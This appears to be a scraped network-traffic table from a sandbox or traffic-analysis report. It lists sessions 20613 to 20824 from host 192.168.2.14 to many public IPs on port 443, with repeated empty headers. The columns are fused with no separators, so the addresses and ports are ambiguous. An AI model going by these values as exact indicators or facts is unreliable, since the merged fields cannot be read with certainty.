                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20613192.168.2.1453460115.58.114.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20614192.168.2.145464062.236.32.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20615192.168.2.1450444216.140.86.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20616192.168.2.1449656197.81.41.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20617192.168.2.1460482181.115.246.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20618192.168.2.1458850195.172.118.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20619192.168.2.1460000165.250.169.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20620192.168.2.144007275.229.244.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20621192.168.2.1457644220.224.85.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20622192.168.2.14466681.29.171.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20623192.168.2.1439980146.171.206.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20624192.168.2.143585285.184.88.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20625192.168.2.145280627.103.170.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20626192.168.2.1458246112.29.193.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20627192.168.2.1455632104.191.92.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20628192.168.2.1445680204.153.23.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20629192.168.2.1444488114.129.31.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20630192.168.2.1459814140.240.170.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20631192.168.2.146052875.229.205.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20632192.168.2.1447268157.191.65.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20633192.168.2.1450644188.26.145.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20634192.168.2.1453306146.213.114.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20635192.168.2.1435544176.163.186.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20636192.168.2.145074287.162.152.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20637192.168.2.144401437.109.2.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20638192.168.2.143758482.193.151.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20639192.168.2.143997612.44.199.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20640192.168.2.145714814.209.195.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20641192.168.2.1454424160.104.177.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20642192.168.2.1458226114.205.208.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20643192.168.2.145844831.1.128.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20644192.168.2.144823292.26.203.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20645192.168.2.146060645.19.120.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20646192.168.2.1440150178.217.242.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20647192.168.2.1456898145.122.231.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20648192.168.2.1445800170.48.175.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20649192.168.2.145417860.121.46.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20650192.168.2.143428439.31.90.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20651192.168.2.145758817.184.142.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20652192.168.2.145837496.225.236.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20653192.168.2.145994847.80.15.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20654192.168.2.1442238124.52.245.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20655192.168.2.1458350112.72.199.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20656192.168.2.143736695.1.86.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20657192.168.2.1434096199.179.240.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20658192.168.2.145903468.194.14.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20659192.168.2.1446272114.177.22.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20660192.168.2.1441640122.221.90.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20661192.168.2.143934237.25.133.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20662192.168.2.145308014.197.149.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20663192.168.2.1458922110.78.247.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20664192.168.2.1453588159.188.176.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20665192.168.2.14462345.250.46.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20666192.168.2.145277038.2.235.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20667192.168.2.1448004116.179.244.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20668192.168.2.1456964148.181.142.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20669192.168.2.1453730221.9.192.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20670192.168.2.143898854.114.254.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20671192.168.2.145725235.114.250.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20672192.168.2.1436274118.245.67.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20673192.168.2.1460102196.57.211.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20674192.168.2.1434228157.210.140.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20675192.168.2.143563842.16.124.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20676192.168.2.145921217.116.20.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20677192.168.2.143707435.94.46.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20678192.168.2.1440180223.135.155.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20679192.168.2.1436220147.34.154.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20680192.168.2.1449060149.254.9.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20681192.168.2.1441974200.141.158.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20682192.168.2.1452102162.76.223.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20683192.168.2.1446606162.77.168.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20684192.168.2.145776241.10.39.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20685192.168.2.1450790165.79.225.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20686192.168.2.145631866.210.51.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20687192.168.2.144415879.231.14.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20688192.168.2.1451248192.183.247.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20689192.168.2.143375085.233.233.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20690192.168.2.1443256203.75.178.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20691192.168.2.1441156125.12.26.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20692192.168.2.144881691.217.30.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20693192.168.2.1456366137.21.109.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20694192.168.2.145842487.234.184.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20695192.168.2.1438906200.117.49.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20696192.168.2.144581652.128.196.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20697192.168.2.1458636142.4.160.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20698192.168.2.1455886209.115.142.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20699192.168.2.1444584218.227.181.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20700192.168.2.1444592151.195.38.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20701192.168.2.145837875.202.252.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20702192.168.2.14389782.171.10.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20703192.168.2.1437702160.46.137.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20704192.168.2.1440976130.27.207.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20705192.168.2.1459686183.111.115.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20706192.168.2.143517013.63.145.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20707192.168.2.1443738129.135.131.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20708192.168.2.1433338157.36.82.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20709192.168.2.145345673.29.186.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20710192.168.2.144363873.177.200.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20711192.168.2.144195494.169.12.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20712192.168.2.14559809.26.65.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20713192.168.2.145248254.201.40.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20714192.168.2.1440688188.213.118.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20715192.168.2.1459604200.19.248.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20716192.168.2.143343252.47.19.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20717192.168.2.1433100171.29.114.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20718192.168.2.1439648102.167.158.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20719192.168.2.1448978210.225.141.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20720192.168.2.143886023.137.199.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20721192.168.2.143569043.212.196.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20722192.168.2.144321652.32.215.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20723192.168.2.143289244.49.140.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20724192.168.2.1437338182.201.156.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20725192.168.2.1445046216.14.22.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20726192.168.2.1445708192.152.87.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20727192.168.2.1441776138.241.67.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20728192.168.2.1434496170.45.74.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20729192.168.2.146041064.222.233.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20730192.168.2.14338544.191.67.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20731192.168.2.1460556207.89.153.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20732192.168.2.1459414145.219.180.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20733192.168.2.145069449.134.177.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20734192.168.2.1447972159.33.225.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20735192.168.2.1457108146.121.98.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20736192.168.2.144814698.74.126.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20737192.168.2.1444030166.34.130.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20738192.168.2.1441164132.132.8.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20739192.168.2.144521249.127.54.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20740192.168.2.1448848207.6.54.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20741192.168.2.1445462106.73.24.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20742192.168.2.145650444.247.91.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20743192.168.2.145336819.203.138.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20744192.168.2.1432880156.117.193.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20745192.168.2.145156853.255.20.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20746192.168.2.1449582190.167.248.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20747192.168.2.143519666.120.220.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20748192.168.2.1445926204.167.123.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20749192.168.2.1441836148.70.121.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20750192.168.2.1451708162.185.85.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20751192.168.2.1433548203.74.208.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20752192.168.2.144117080.40.164.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20753192.168.2.1449144100.166.26.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20754192.168.2.1442358140.199.226.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20755192.168.2.1447648187.83.94.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20756192.168.2.144633475.137.109.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20757192.168.2.1446282112.113.140.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20758192.168.2.1433870156.54.137.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20759192.168.2.1457462183.29.89.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20760192.168.2.145295298.200.90.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20761192.168.2.1460502136.16.199.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20762192.168.2.1460032203.82.223.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20763192.168.2.1457646120.173.198.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20764192.168.2.145705898.120.94.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20765192.168.2.144277651.121.201.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20766192.168.2.1440606129.145.209.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20767192.168.2.143577440.56.208.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20768192.168.2.1455058199.54.242.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20769192.168.2.144066653.157.77.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20770192.168.2.1435426146.107.219.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20771192.168.2.1437076190.17.195.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20772192.168.2.1453002217.132.215.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20773192.168.2.1458686183.184.149.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20774192.168.2.144148264.146.224.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20775192.168.2.145245864.227.188.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20776192.168.2.1450950156.179.236.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20777192.168.2.1453884125.46.208.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20778192.168.2.145455219.203.147.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20779192.168.2.1444126147.156.116.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20780192.168.2.14468384.238.247.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20781192.168.2.143312440.166.231.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20782192.168.2.1454164222.189.185.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20783192.168.2.143791268.123.86.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20784192.168.2.143585235.161.29.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20785192.168.2.1437076181.26.182.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20786192.168.2.1438142115.54.126.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20787192.168.2.143842866.86.203.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20788192.168.2.1451578136.119.16.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20789192.168.2.145328870.125.200.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20790192.168.2.144208482.202.119.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20791192.168.2.14435265.44.131.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20792192.168.2.145905687.107.187.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20793192.168.2.145489466.182.197.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20794192.168.2.145047291.233.207.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20795192.168.2.1437686178.17.40.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20796192.168.2.1454606187.0.9.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20797192.168.2.1459466101.61.255.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20798192.168.2.1458764164.64.159.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20799192.168.2.145096462.145.71.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20800192.168.2.1433272119.132.89.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20801192.168.2.1436116149.41.237.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20802192.168.2.1438052131.34.89.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20803192.168.2.1438164183.69.197.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20804192.168.2.1442942106.83.246.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20805192.168.2.1442186180.83.105.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20806192.168.2.1454852149.81.49.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20807192.168.2.1438888114.13.135.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20808192.168.2.144534866.217.96.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20809192.168.2.1440824218.125.241.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20810192.168.2.1454474166.116.129.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20811192.168.2.1457576203.91.65.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20812192.168.2.1458876208.224.83.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20813192.168.2.1456466185.5.218.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20814192.168.2.144826267.233.45.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20815192.168.2.1450766194.33.5.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20816192.168.2.144383689.10.125.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20817192.168.2.1435044142.252.210.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20818192.168.2.143841227.127.199.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20819192.168.2.1456278106.125.106.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20820192.168.2.1457248180.168.97.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20821192.168.2.143572662.222.106.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20822192.168.2.1438980167.70.10.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20823192.168.2.1434276192.167.12.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20824192.168.2.1437328120.246.113.53443
                                                        TimestampBytes transferredDirectionData


